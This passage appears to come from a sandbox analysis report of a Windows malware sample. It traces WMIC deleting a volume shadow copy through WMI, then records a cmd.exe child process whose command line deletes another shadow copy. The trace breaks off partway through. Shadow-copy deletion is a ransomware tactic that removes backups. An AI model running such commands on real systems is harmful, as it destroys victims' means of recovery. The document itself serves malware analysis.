lstrlenW (lpString="from") returned 4 [0077.070] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0077.070] malloc (_Size=0x18) returned 0x35cc00 [0077.070] free (_Block=0x35cb80) [0077.070] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3c00760009 | out: _String=0x0, _Context=0x3c00760009) returned="Win32_ShadowCopy" [0077.070] malloc (_Size=0x18) returned 0x35cb80 [0077.070] free (_Block=0x35cc00) [0077.070] free (_Block=0x35d080) [0077.070] free (_Block=0x35cb80) [0077.070] lstrlenW (lpString="SET") returned 3 [0077.070] lstrlenW (lpString="delete") returned 6 [0077.070] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0077.070] lstrlenW (lpString="CREATE") returned 6 [0077.070] lstrlenW (lpString="delete") returned 6 [0077.070] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0077.070] free (_Block=0x35cef0) [0077.070] malloc (_Size=0x8) returned 0x356f20 [0077.070] lstrlenW (lpString="GET") returned 3 [0077.070] lstrlenW (lpString="delete") returned 6 [0077.070] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0077.070] lstrlenW (lpString="LIST") returned 4 [0077.070] lstrlenW (lpString="delete") returned 6 [0077.070] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0077.071] lstrlenW (lpString="ASSOC") returned 5 [0077.071] lstrlenW (lpString="delete") returned 6 [0077.071] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0077.071] WbemLocator:IUnknown:AddRef (This=0x1e91390) returned 0x3 [0077.071] free (_Block=0x36dfb0) [0077.071] lstrlenW (lpString="") returned 0 [0077.071] lstrlenW (lpString="XDUWTFONO") returned 9 [0077.071] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0077.071] lstrlenW (lpString="XDUWTFONO") returned 9 [0077.071] malloc (_Size=0x14) returned 0x35cb80 [0077.071] lstrlenW (lpString="XDUWTFONO") returned 9 [0077.071] GetCurrentThreadId () returned 0x664 [0077.071] GetCurrentProcess () returned 0xffffffffffffffff [0077.071] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x18fae0 | out: TokenHandle=0x18fae0*=0x27c) returned 1 [0077.071] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18fad8 | out: TokenInformation=0x0, ReturnLength=0x18fad8) returned 0 [0077.071] malloc (_Size=0x118) returned 0x35d080 [0077.071] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x35d080, TokenInformationLength=0x118, ReturnLength=0x18fad8 | out: TokenInformation=0x35d080, ReturnLength=0x18fad8) returned 1 [0077.071] AdjustTokenPrivileges (in: TokenHandle=0x27c, DisableAllPrivileges=0, NewState=0x35d080*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-226851807, Attributes=0x2f10), (Luid.LowPart=0x0, Luid.HighPart=3526384, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0077.071] free (_Block=0x35d080) [0077.071] CloseHandle (hObject=0x27c) returned 1 [0077.071] lstrlenW (lpString="GET") returned 3 [0077.071] lstrlenW (lpString="delete") returned 6 [0077.071] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0077.071] lstrlenW (lpString="LIST") returned 4 [0077.071] lstrlenW (lpString="delete") returned 6 [0077.071] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0077.071] lstrlenW (lpString="SET") returned 3 [0077.071] lstrlenW (lpString="delete") returned 6 [0077.071] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0077.072] lstrlenW (lpString="CALL") returned 4 [0077.072] lstrlenW (lpString="delete") returned 6 [0077.072] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0077.072] lstrlenW (lpString="ASSOC") returned 5 [0077.072] lstrlenW (lpString="delete") returned 6 [0077.072] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0077.072] lstrlenW (lpString="CREATE") returned 6 [0077.072] lstrlenW (lpString="delete") returned 6 [0077.072] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0077.072] lstrlenW (lpString="DELETE") returned 6 [0077.072] lstrlenW (lpString="delete") returned 6 [0077.072] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0077.073] malloc (_Size=0x18) returned 0x35cc00 [0077.073] lstrlenA (lpString="") returned 0 [0077.073] malloc (_Size=0x2) returned 0x36dfb0 [0077.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff74314c, cbMultiByte=-1, lpWideCharStr=0x36dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0077.073] free (_Block=0x36dfb0) [0077.073] malloc (_Size=0x18) returned 0x35cca0 [0077.073] lstrlenA (lpString="") returned 0 [0077.073] malloc (_Size=0x2) returned 0x36dfb0 [0077.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff74314c, cbMultiByte=-1, lpWideCharStr=0x36dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0077.073] free (_Block=0x36dfb0) [0077.073] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0077.073] malloc (_Size=0x3e) returned 0x35d080 [0077.073] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0077.073] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0077.073] malloc (_Size=0x18) returned 0x35cba0 [0077.073] free (_Block=0x35cca0) [0077.073] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3f006e0007 | out: _String=0x0, _Context=0x3f006e0007) returned="*" [0077.073] lstrlenW (lpString="FROM") returned 4 [0077.073] lstrlenW (lpString="*") returned 1 [0077.073] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0077.074] malloc (_Size=0x18) returned 0x35cca0 [0077.074] free (_Block=0x35cba0) [0077.074] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x40006e0007 | out: _String=0x0, _Context=0x40006e0007) returned="from" [0077.074] lstrlenW (lpString="FROM") returned 4 [0077.074] lstrlenW (lpString="from") returned 4 [0077.074] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0077.074] malloc (_Size=0x18) returned 0x35cba0 [0077.074] free (_Block=0x35cca0) [0077.074] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x41006e0007 | out: _String=0x0, _Context=0x41006e0007) returned="Win32_ShadowCopy" [0077.074] malloc (_Size=0x18) returned 0x35cca0 [0077.074] free (_Block=0x35cba0) [0077.074] free (_Block=0x35d080) [0077.074] malloc (_Size=0x18) returned 0x35cba0 [0077.074] malloc (_Size=0x18) returned 0x35cc20 [0077.074] malloc (_Size=0x18) returned 0x35cc40 [0077.074] malloc (_Size=0x18) returned 0x35cc60 [0077.074] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0077.074] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0077.074] malloc (_Size=0x18) returned 0x35cc80 [0077.074] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0077.075] SysStringLen (param_1=" WHERE ") returned 0x7 [0077.075] malloc (_Size=0x18) returned 0x35ccc0 [0077.075] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ") returned 0x25 [0077.075] SysStringLen (param_1="ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'") returned 0x2b [0077.075] free (_Block=0x35cc00) [0077.075] free (_Block=0x35cc80) [0077.075] free (_Block=0x35cc60) [0077.075] free (_Block=0x35cc40) [0077.075] free (_Block=0x35cc20) [0077.075] free (_Block=0x35cba0) [0077.075] ??0CHString@@QEAA@XZ () returned 0x18fa50 [0077.075] GetCurrentThreadId () returned 0x664 [0077.075] malloc (_Size=0x18) returned 0x35cba0 [0077.075] malloc (_Size=0x18) returned 0x35cc20 [0077.075] malloc (_Size=0x18) returned 0x35cc40 [0077.075] malloc (_Size=0x18) returned 0x35cc60 [0077.075] malloc (_Size=0x18) returned 0x35cc80 [0077.075] SysStringLen (param_1="\\\\") returned 0x2 [0077.075] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0077.075] malloc (_Size=0x18) returned 0x35cc00 [0077.075] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0077.075] SysStringLen (param_1="\\") returned 0x1 [0077.076] malloc (_Size=0x18) returned 0x35cce0 [0077.076] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0077.076] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0077.076] free (_Block=0x35cc00) [0077.076] free (_Block=0x35cc80) [0077.076] free (_Block=0x35cc60) [0077.076] free (_Block=0x35cc40) [0077.076] free (_Block=0x35cc20) [0077.076] free (_Block=0x35cba0) [0077.076] malloc (_Size=0x18) returned 0x35cba0 [0077.076] malloc (_Size=0x18) returned 0x35cc20 [0077.076] malloc (_Size=0x18) returned 0x35cc40 [0077.076] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1e91390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff7b29d0 | out: ppNamespace=0xff7b29d0*=0x1ea3c18) returned 0x0 [0077.080] free (_Block=0x35cc40) [0077.080] free (_Block=0x35cc20) [0077.080] free (_Block=0x35cba0) [0077.080] CoSetProxyBlanket (pProxy=0x1ea3c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0077.081] free (_Block=0x35cce0) [0077.081] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0077.081] ??0CHString@@QEAA@XZ () returned 0x18f9a0 [0077.081] GetCurrentThreadId () returned 0x664 [0077.081] malloc (_Size=0x18) returned 0x35cce0 [0077.081] lstrlenA (lpString="") returned 0 [0077.081] malloc (_Size=0x2) returned 0x36dfb0 [0077.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff74314c, cbMultiByte=-1, lpWideCharStr=0x36dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0077.081] free (_Block=0x36dfb0) [0077.081] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'") returned 0x50 [0077.081] SysStringLen (param_1="") returned 0x0 [0077.081] free (_Block=0x35cce0) [0077.081] malloc (_Size=0x18) returned 0x35cce0 [0077.081] IWbemServices:ExecQuery (in: This=0x1ea3c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy WHERE ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'", lFlags=0, pCtx=0x0, ppEnum=0x18f9a8 | out: ppEnum=0x18f9a8*=0x1ea3d18) returned 0x0 [0077.145] free (_Block=0x35cce0) [0077.145] CoSetProxyBlanket (pProxy=0x1ea3d18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0077.147] IEnumWbemClassObject:Next (in: This=0x1ea3d18, lTimeout=-1, uCount=0x1, apObjects=0x18f9b0, puReturned=0x18f9c0 | out: apObjects=0x18f9b0*=0x1ea3d80, puReturned=0x18f9c0*=0x1) returned 0x0 [0077.148] malloc (_Size=0x18) returned 0x35cce0 [0077.148] IWbemClassObject:Get (in: This=0x1ea3d80, wszName="__PATH", lFlags=0, pVal=0x18f9d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f9d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0077.148] free (_Block=0x35cce0) [0077.148] malloc (_Size=0x800) returned 0x35d080 [0077.148] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x35d080, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0077.149] FormatMessageW (in: dwFlags=0x2500, lpSource=0x35d080, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x18f8f8, nSize=0x0, Arguments=0x18f908 | out: lpBuffer="뚐$") returned 0x67 [0077.149] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0077.149] malloc (_Size=0x68) returned 0x35d890 [0077.149] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x35d890, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0077.149] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff7b2ab0 [0077.149] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0077.149] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0077.149] free (_Block=0x35d890) [0077.149] free (_Block=0x35d080) [0077.149] LocalFree (hMem=0x24b690) returned 0x0 [0077.149] IWbemServices:DeleteInstance (in: This=0x1ea3c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0084.391] IUnknown:Release (This=0x1ea3d80) returned 0x0 [0084.391] malloc (_Size=0x800) returned 0x35d080 [0084.391] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x35d080, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0084.391] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0084.391] malloc (_Size=0x20) returned 0x35cef0 [0084.391] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x35cef0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0084.391] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff7b2ab0 [0084.391] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0084.392] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0084.392] free (_Block=0x35cef0) [0084.392] free (_Block=0x35d080) [0084.392] IEnumWbemClassObject:Next (in: This=0x1ea3d18, lTimeout=-1, uCount=0x1, apObjects=0x18f9b0, puReturned=0x18f9c0 | out: apObjects=0x18f9b0*=0x0, puReturned=0x18f9c0*=0x0) returned 0x1 [0084.393] IUnknown:Release (This=0x1ea3d18) returned 0x0 [0084.394] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0084.394] free (_Block=0x35cca0) [0084.394] free (_Block=0x35ccc0) [0084.394] GetCurrentThreadId () returned 0x664 [0084.394] ??0CHString@@QEAA@PEBG@Z () returned 0x18fb88 [0084.394] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x18fb88 [0084.394] lstrlenW (lpString="LIST") returned 4 [0084.394] lstrlenW (lpString="delete") returned 6 [0084.394] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0084.394] lstrlenW (lpString="ASSOC") returned 5 [0084.394] lstrlenW (lpString="delete") returned 6 [0084.394] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0084.394] lstrlenW (lpString="GET") returned 3 [0084.394] lstrlenW (lpString="delete") returned 6 [0084.394] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0084.395] ??1CHString@@QEAA@XZ () returned 0x137a8601 [0084.395] WbemLocator:IUnknown:Release (This=0x1ea3c18) returned 0x0 [0084.395] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0084.395] _kbhit () returned 0x0 [0084.418] free (_Block=0x356f20) [0084.418] free (_Block=0x35cac0) [0084.418] free (_Block=0x35caa0) [0084.418] free (_Block=0x35ca80) [0084.418] free (_Block=0x35ca60) [0084.418] free (_Block=0x3570a0) [0084.418] free (_Block=0x35cb40) [0084.418] free (_Block=0x3585c0) [0084.418] free (_Block=0x35d020) [0084.418] free (_Block=0x35cbc0) [0084.418] free (_Block=0x35cfa0) [0084.418] free (_Block=0x35cae0) [0084.418] free (_Block=0x35cbe0) [0084.418] free (_Block=0x357140) [0084.418] free (_Block=0x356e00) [0084.418] free (_Block=0x35cff0) [0084.420] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0084.420] free (_Block=0x35ce20) [0084.420] free (_Block=0x35cb00) [0084.420] free (_Block=0x35cb20) [0084.420] free (_Block=0x35cf30) [0084.420] free (_Block=0x35cb60) [0084.420] free (_Block=0x357ee0) [0084.420] free (_Block=0x357f30) [0084.420] free (_Block=0x357f80) [0084.420] free (_Block=0x35cb80) [0084.420] free (_Block=0x356a20) [0084.420] free (_Block=0x356de0) [0084.420] free (_Block=0x358040) [0084.420] free (_Block=0x356dc0) [0084.420] free (_Block=0x358000) [0084.420] free (_Block=0x356d60) [0084.420] free (_Block=0x356d80) [0084.420] free (_Block=0x356c40) [0084.420] free (_Block=0x356c60) [0084.420] free (_Block=0x356be0) [0084.420] free (_Block=0x356c00) [0084.421] free (_Block=0x356ca0) [0084.421] free (_Block=0x356cc0) [0084.421] free (_Block=0x356d00) [0084.421] free (_Block=0x356d20) [0084.421] free (_Block=0x356b20) [0084.421] free (_Block=0x356b40) [0084.421] free (_Block=0x356ac0) [0084.421] free (_Block=0x356ae0) [0084.421] free (_Block=0x356b80) [0084.421] free (_Block=0x356ba0) [0084.421] free (_Block=0x356a60) [0084.421] free (_Block=0x356a80) [0084.421] free (_Block=0x3569d0) [0084.421] free (_Block=0x3569a0) [0084.421] free (_Block=0x356e90) [0084.421] WbemLocator:IUnknown:Release (This=0x1e91390) returned 0x2 [0084.421] WbemLocator:IUnknown:Release (This=0x1ea3b28) returned 0x0 [0084.425] WbemLocator:IUnknown:Release (This=0x1ea3a98) returned 0x0 [0084.427] WbemLocator:IUnknown:Release (This=0x1e91390) returned 0x1 [0084.427] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0084.427] WbemLocator:IUnknown:Release (This=0x1e91390) returned 0x0 [0084.427] free (_Block=0x35c9e0) [0084.427] free (_Block=0x35ca00) [0084.427] free (_Block=0x358540) [0084.427] free (_Block=0x35ca20) [0084.427] free (_Block=0x35ca40) [0084.427] free (_Block=0x358580) [0084.427] free (_Block=0x35c860) [0084.427] free (_Block=0x35c880) [0084.427] free (_Block=0x3583c0) [0084.427] free (_Block=0x35c8a0) [0084.428] free (_Block=0x35c8c0) [0084.428] free (_Block=0x358400) [0084.428] free (_Block=0x35c7e0) [0084.428] free (_Block=0x35c800) [0084.428] free (_Block=0x358340) [0084.428] free (_Block=0x35c820) [0084.428] free (_Block=0x35c840) [0084.428] free (_Block=0x358380) [0084.428] free (_Block=0x35c960) [0084.428] free (_Block=0x35c980) [0084.428] free (_Block=0x3584c0) [0084.428] free (_Block=0x35c9a0) [0084.428] free (_Block=0x35c9c0) [0084.428] free (_Block=0x358500) [0084.428] free (_Block=0x35c760) [0084.428] free (_Block=0x35c780) [0084.428] free (_Block=0x3582c0) [0084.428] free (_Block=0x35c7a0) [0084.428] free (_Block=0x35c7c0) [0084.428] free (_Block=0x358300) [0084.429] free (_Block=0x35c8e0) [0084.429] free (_Block=0x35c900) [0084.429] free (_Block=0x358440) [0084.429] free (_Block=0x35c920) [0084.429] free (_Block=0x35c940) [0084.429] free (_Block=0x358480) [0084.429] free (_Block=0x35c6a0) [0084.429] free (_Block=0x35c6c0) [0084.429] free (_Block=0x358200) [0084.429] free (_Block=0x35c560) [0084.429] free (_Block=0x35c580) [0084.429] free (_Block=0x3580c0) [0084.429] free (_Block=0x356e50) [0084.429] free (_Block=0x356e70) [0084.429] free (_Block=0x358080) [0084.429] free (_Block=0x35c5e0) [0084.429] free (_Block=0x35c600) [0084.429] free (_Block=0x358140) [0084.429] free (_Block=0x35c6e0) [0084.429] free (_Block=0x35c700) [0084.429] free (_Block=0x358240) [0084.430] free (_Block=0x35c5a0) [0084.430] free (_Block=0x35c5c0) [0084.430] free (_Block=0x358100) [0084.430] free (_Block=0x35c620) [0084.430] free (_Block=0x35c640) [0084.430] free (_Block=0x358180) [0084.430] free (_Block=0x35c660) [0084.430] free (_Block=0x35c680) [0084.430] free (_Block=0x3581c0) [0084.430] free (_Block=0x35c720) [0084.430] free (_Block=0x35c740) [0084.430] free (_Block=0x358280) [0084.430] CoUninitialize () [0084.460] exit (_Code=0) [0084.460] free (_Block=0x35cd30) [0084.461] free (_Block=0x357ea0) [0084.461] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0084.461] free (_Block=0x356f40) [0084.461] free (_Block=0x356a40) [0084.461] free (_Block=0x357e60) [0084.461] free (_Block=0x357e20) [0084.461] free (_Block=0x357dd0) [0084.461] free (_Block=0x357d90) [0084.461] free (_Block=0x357d30) [0084.461] free (_Block=0x355a90) [0084.461] free (_Block=0x355a50) [0084.461] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0084.461] free (_Block=0x35cec0) Thread: id = 110 os_tid = 0x688 Thread: id = 111 os_tid = 0x67c Thread: id = 112 os_tid = 0x564 Thread: id = 113 os_tid = 0x114 Thread: id = 114 os_tid = 0x5bc Process: id = "10" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0xfd6000" os_pid = "0x84c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xaec" cmd_line = "cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 115 os_tid = 0x85c [0084.609] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f7f0 | out: lpSystemTimeAsFileTime=0x12f7f0*(dwLowDateTime=0x3a17d110, dwHighDateTime=0x1d68245)) [0084.609] GetCurrentProcessId () returned 0x84c [0084.609] GetCurrentThreadId () returned 0x85c [0084.609] GetTickCount () returned 0x114afb0 [0084.609] QueryPerformanceCounter (in: lpPerformanceCount=0x12f7f8 | out: lpPerformanceCount=0x12f7f8*=20450257635) returned 1 [0084.612] GetModuleHandleW (lpModuleName=0x0) returned 0x4a240000 [0084.612] __set_app_type (_Type=0x1) [0084.612] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a267810) returned 0x0 [0084.612] __getmainargs (in: _Argc=0x4a28a608, _Argv=0x4a28a618, _Env=0x4a28a610, _DoWildCard=0, _StartInfo=0x4a26e0f4 | out: _Argc=0x4a28a608, _Argv=0x4a28a618, _Env=0x4a28a610) returned 0 [0084.612] GetCurrentThreadId () returned 0x85c [0084.612] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x85c) returned 0x3c [0084.612] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0084.612] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0084.613] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0084.613] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0084.613] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12f788 | out: phkResult=0x12f788*=0x0) returned 0x2 [0084.613] VirtualQuery (in: lpAddress=0x12f770, lpBuffer=0x12f6f0, dwLength=0x30 | out: lpBuffer=0x12f6f0*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.613] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12f6f0, dwLength=0x30 | out: lpBuffer=0x12f6f0*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.613] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12f6f0, dwLength=0x30 | out: lpBuffer=0x12f6f0*(BaseAddress=0x31000, 